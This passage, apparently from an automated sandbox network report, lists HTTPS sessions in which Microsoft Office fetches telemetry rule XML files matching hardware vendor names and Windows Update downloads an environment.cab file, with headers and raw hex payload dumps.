                                                  2024-11-27 17:09:40 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17192.168.2.64972813.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:40 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:40 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:40 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 427
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                  ETag: "0x8DC582BA310DA18"
                                                  x-ms-request-id: c665a67d-901e-002a-1b91-3f7a27000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170940Z-174f78459685m244hC1EWRgp2c0000000wz000000000qq4d
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:40 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18192.168.2.64972913.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:40 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:40 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:40 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 486
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                  ETag: "0x8DC582B9018290B"
                                                  x-ms-request-id: dc0e488f-901e-005b-3891-3f2005000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170940Z-174f7845968xr5c2hC1EWRd0hn0000000dyg00000000sy7k
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:40 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19192.168.2.64973013.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:40 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:40 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:40 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 407
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                  ETag: "0x8DC582B9698189B"
                                                  x-ms-request-id: ff98645e-b01e-0001-1091-3f46e2000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170940Z-174f78459684bddphC1EWRbht40000000wv000000000tk0a
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:40 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  20192.168.2.64972420.109.210.53443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:40 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=yxKAAfE1arTmDDx&MD=11F9SbpG HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                  Host: slscr.update.microsoft.com
                                                  2024-11-27 17:09:41 UTC560INHTTP/1.1 200 OK
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Content-Type: application/octet-stream
                                                  Expires: -1
                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                  ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                  MS-CorrelationId: a936f452-98ee-41bd-807e-8154b50f2c22
                                                  MS-RequestId: 3ca6fa96-8285-4335-91b7-809ea484444c
                                                  MS-CV: jNHU1kqH40CAMDuV.0
                                                  X-Microsoft-SLSClientCache: 2880
                                                  Content-Disposition: attachment; filename=environment.cab
                                                  X-Content-Type-Options: nosniff
                                                  Date: Wed, 27 Nov 2024 17:09:40 GMT
                                                  Connection: close
                                                  Content-Length: 24490
                                                  2024-11-27 17:09:41 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                  Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                  2024-11-27 17:09:41 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                  Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21192.168.2.64973413.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:42 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:43 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:42 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 477
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                  ETag: "0x8DC582BB8CEAC16"
                                                  x-ms-request-id: e9babc56-001e-0049-5291-3f5bd5000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170942Z-174f7845968kdththC1EWRzvxn00000009h000000000hua4
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:43 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  22192.168.2.64973313.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:42 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:43 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:42 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 415
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                  ETag: "0x8DC582BA41997E3"
                                                  x-ms-request-id: 106d127d-401e-008c-1a91-3f86c2000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170942Z-174f78459688l8rvhC1EWRtzr000000009rg00000000pzpr
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:43 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  23192.168.2.64973513.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:42 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:43 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:42 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 464
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                  ETag: "0x8DC582B97FB6C3C"
                                                  x-ms-request-id: a99e6065-701e-006f-4d91-3fafc4000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170942Z-174f7845968kdththC1EWRzvxn00000009gg00000000m7ys
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:43 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  24192.168.2.64973213.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:42 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:43 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:42 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 469
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                  ETag: "0x8DC582BBA701121"
                                                  x-ms-request-id: 614103fc-b01e-003e-0d68-408e41000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170942Z-174f78459684bddphC1EWRbht40000000x20000000000w8z
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:43 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  25192.168.2.64973613.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:42 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:43 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:43 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 494
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                  ETag: "0x8DC582BB7010D66"
                                                  x-ms-request-id: 3fc8b732-401e-0083-1091-3f075c000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170943Z-174f7845968zgtf6hC1EWRqd8s0000000q3000000000q1y1
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:43 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  26192.168.2.64973913.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:44 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:45 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:45 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 419
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                  ETag: "0x8DC582B9748630E"
                                                  x-ms-request-id: 02716611-001e-00ad-7089-3f554b000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170945Z-174f7845968qj8jrhC1EWRh41s0000000x5000000000dvfr
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:09:45 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  27192.168.2.64974213.107.246.63443
